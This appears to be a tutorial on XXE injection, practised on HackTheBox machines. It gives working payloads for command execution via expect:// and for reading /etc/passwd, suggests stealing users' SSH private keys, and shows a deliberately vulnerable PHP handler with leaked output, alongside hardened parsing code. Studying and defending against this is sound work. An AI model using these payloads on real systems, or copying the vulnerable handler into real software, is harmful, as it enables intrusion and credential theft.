
XML Injection
To practice, we can play with the Aragog and DevOops machines from HackTheBox. First of all, I want to point out that to interpret the content it is necessary to know the XML structure behind it; let me explain. Suppose that after uploading an XML file, the web shows us the following output:
User: zer0cool
Password: myPassword
This is the case because, in some way, we have previously been told that the sub-tags to define in our XML file are User and Pass, wrapped in a main creds tag that encompasses them. This allows us to carry out an attack like the one described below.
Initially, we would be sending the following XML file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<creds>
<User>zer0cool</User>
<Pass>myPassword</Pass>
</creds>
Knowing the structure, we can then send content like the following, which declares an external entity in the DOCTYPE and references it from the User tag:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "expect://id">]>
<creds>
<User>&xxe;</User>
<Pass>myPassword</Pass>
</creds>
When we look at the output on the web, we find the following result:
User: www-data
Password: myPassword
This works because we are using the expect wrapper, which runs the command and returns its output in place of the entity. Note that this wrapper depends on the PECL expect extension, which is not installed by default, so there are cases in which it will not be possible to execute commands on the system. In that case we can try to read files in the following way:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<creds>
<User>&xxe;</User>
<Pass>myPassword</Pass>
</creds>
As expected, the User field will then show the content of the /etc/passwd file. A useful follow-up is to take the list of users obtained from that file and check, for each user with a home directory, whether a private SSH key (for example id_rsa) can be read from their .ssh directory through the same entity. Using that key as the identity file, we would be able to access the system over SSH without providing any password.
Another practical example, and another way of carrying out the same procedure, is the following. Suppose an Apache service where this time we cannot upload files, but the following code sits behind it:
<?php
// Deliberately vulnerable handler: reads the raw POST body as XML and echoes the user element back.
libxml_disable_entity_loader(false);   // re-enables external entity loading (deprecated since PHP 8.0)
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
// LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads the DTD: this is what makes XXE possible
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $creds->user;
$pass = $creds->pass;
echo "You have logged in as user $user";
?>
The code clearly expects an XML structure like the following:
<creds>
<user>Ed</user>
<pass>mypass</pass>
</creds>
In this case the request varies a bit, since the XML goes in the POST body, but we can send it from the terminal:
$ curl -d @xml.txt http://localhost/xml_injectable.php
The concept is the same at the end of the day; the server responds with the following:
You have logged in as user Ed
As a result, we can craft a malicious XML structure like the following:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
What do we get with this? The following:
$ curl -d @xml.txt http://localhost/xml_injectable.php
You have logged in as user root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
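As an added example (not code from the original post), here is the vulnerable handler shown above placed next to a hardened version, both run offline against a constructed payload of the same shape as the ones in this post. The temp file standing in for /etc/passwd or a private key, the function names and the file name xxe_demo.php are my own assumptions; it assumes a PHP build with the dom and simplexml extensions.

```php
<?php
// Added example (not the original post's code): the post's vulnerable handler
// beside a hardened one, exercised offline with a constructed XXE payload.
// Assumes PHP >= 7.4 with the dom and simplexml extensions.

// Constructed stand-in for /etc/passwd or a private key: a temp file we control.
$secret = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secret, "root:x:0:0:root:/root:/bin/bash\n");

// Same payload shape as in the post, with the SYSTEM entity pointing at the temp file.
$payload = '<?xml version="1.0" encoding="ISO-8859-1"?>' . "\n"
    . '<!DOCTYPE foo [<!ELEMENT foo ANY>' . "\n"
    . '<!ENTITY xxe SYSTEM "file://' . $secret . '">]>' . "\n"
    . "<creds><user>&xxe;</user><pass>mypass</pass></creds>\n";

$benign = "<creds><user>Ed</user><pass>mypass</pass></creds>";

// Vulnerable: mirrors the post's handler. LIBXML_NOENT asks libxml to substitute
// entities, so the SYSTEM entity is fetched through the external entity loader.
function parse_vulnerable(string $xml): string
{
    libxml_set_external_entity_loader(null);  // default loader (the loader is process-global)
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    return (string) $creds->user;
}

// Hardened: our credentials format never needs a DTD, so reject any DOCTYPE up
// front, never ask for entity substitution, forbid network access, and make the
// external entity loader refuse everything (LIBXML_NONET alone leaves file:// open).
function parse_hardened(string $xml): ?string
{
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        return null;                          // DTD present: refuse the document
    }
    libxml_set_external_entity_loader(
        static function ($public, $system, $context) {
            return null;                      // null means "cannot load", for every entity
        }
    );
    libxml_use_internal_errors(true);         // collect parse errors instead of emitting warnings
    $dom = new DOMDocument();
    if (!$dom->loadXML($xml, LIBXML_NONET)) { // no LIBXML_NOENT, no LIBXML_DTDLOAD
        libxml_clear_errors();
        return null;
    }
    $creds = simplexml_import_dom($dom);
    return (string) $creds->user;
}

echo "vulnerable: ", trim(parse_vulnerable($payload)), "\n";     // leaks the file content
var_dump(parse_hardened($payload));                               // NULL: payload rejected
echo "hardened (benign input): ", parse_hardened($benign), "\n"; // Ed
unlink($secret);
```

Run it with php xxe_demo.php. Two points worth keeping in mind: LIBXML_NONET only blocks network fetches and does nothing against file:// or expect:// on the local host, which is why the external entity loader is overridden as well; and libxml_set_external_entity_loader is process-global, so the vulnerable function resets it to keep the two demonstrations independent. On the offensive side, the file:// payload from the post only works on files whose content is well-formed as XML text; a file containing a stray < or & breaks the parse, and the usual workaround against PHP targets is the php://filter/convert.base64-encode/resource=... wrapper, which returns the file base64-encoded.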
That's all, enjoy the content! ;)